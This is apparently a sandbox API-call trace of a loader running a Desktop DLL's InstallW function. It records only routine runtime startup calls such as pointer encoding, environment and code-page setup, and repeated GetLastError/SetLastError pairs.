[0034.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.763] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.764] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.764] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.764] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.764] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.764] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.764] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.764] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.764] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.764] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.764] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.765] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.765] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.765] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.765] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.765] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.765] GetCurrentThreadId () returned 0xccc [0034.765] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"127.0.0.1\"" [0034.765] GetEnvironmentStringsW () returned 0x447860* [0034.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x6b09f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.765] FreeEnvironmentStringsW (penv=0x447860) returned 1 [0034.765] GetStartupInfoA (in: lpStartupInfo=0x28f8c4 | out: lpStartupInfo=0x28f8c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.766] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.766] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.766] SetHandleCount (uNumber=0x20) returned 0x20 [0034.766] GetLastError () returned 0x0 [0034.766] SetLastError (dwErrCode=0x0) [0034.766] GetLastError () returned 0x0 [0034.766] SetLastError (dwErrCode=0x0) [0034.766] GetLastError () returned 0x0 [0034.766] SetLastError (dwErrCode=0x0) [0034.766] GetACP () returned 0x4e4 [0034.766] GetLastError () returned 0x0 [0034.766] SetLastError (dwErrCode=0x0) [0034.766] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.766] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f8a4 | out: lpCPInfo=0x28f8a4) returned 1 [0034.766] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f370 | out: lpCPInfo=0x28f370) returned 1 [0034.766] GetLastError () returned 0x0 [0034.766] SetLastError (dwErrCode=0x0) [0034.766] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x28f300 | out: lpCharType=0x28f300) returned 1 [0034.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f784, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f784, cbMultiByte=256, lpWideCharStr=0x28f0e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.766] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x28f384 | out: lpCharType=0x28f384) returned 1 [0034.766] GetLastError () returned 0x0 [0034.766] SetLastError (dwErrCode=0x0) [0034.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f784, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.767] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f784, cbMultiByte=256, lpWideCharStr=0x28f0b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿԂ矲狰Ā") returned 256 [0034.767] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿԂ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.767] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿԂ矲狰Ā", cchSrc=256, lpDestStr=0x28eea8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x28f684, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÌó¤ô¼ø(", lpUsedDefaultChar=0x0) returned 256 [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f784, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.767] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f784, cbMultiByte=256, lpWideCharStr=0x28f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿԂ矲狰Ā") returned 256 [0034.767] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿԂ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.767] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿԂ矲狰Ā", cchSrc=256, lpDestStr=0x28eec8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x28f584, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÌó¤ô¼ø(", lpUsedDefaultChar=0x0) returned 256 [0034.767] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.767] GetLastError () returned 0x0 [0034.767] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.768] SetLastError (dwErrCode=0x0) [0034.768] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.769] SetLastError (dwErrCode=0x0) [0034.769] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.770] GetLastError () returned 0x0 [0034.770] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.771] SetLastError (dwErrCode=0x0) [0034.771] GetLastError () returned 0x0 [0034.778] SetLastError (dwErrCode=0x0) [0034.778] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.779] SetLastError (dwErrCode=0x0) [0034.779] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 